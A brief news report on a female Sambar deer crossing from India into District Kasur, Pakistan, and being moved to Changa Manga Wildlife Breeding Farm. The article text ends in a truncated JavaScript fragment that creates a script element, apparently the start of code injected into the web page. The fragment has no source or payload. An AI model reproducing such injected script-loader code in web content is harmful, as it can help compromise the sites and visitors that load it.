Female Sambar coming form India catch

Lahore: A special team constituted by Director General Wildlife & Parks Khalid Ayaz Khan for the surveillance of border areas has with the help of Pakistan Rangers caught a female Sambar coming from India and transferred it to Changa Manga Wildlife Breeding Farm.

According to details, Wing Commander Adil Nasim and Deputy Superintendent Rangers Ajmal Hussain informed about the entry of female Sambar into Pakistan in the border area of Ganda Singhwala, District Kasur, upon which, a special team of Wildlife Department took immediate action and it was shifted to Changa Manga Wildlife Breeding Farm.

Director General Wildlife Parks Khalid Ayaz Khan has directed the special teams for the protection and surveillance of wildlife that migration of wildlife is expected due to climate change. Therefore, they should keep a vigilant eye on border area. He further said that a male Sambar will be shifted to Changa Manga Wildlife Breeding Farm from Jallo Wildlife Park for breeding.var d=document;var s=d.createElement(‘script’);
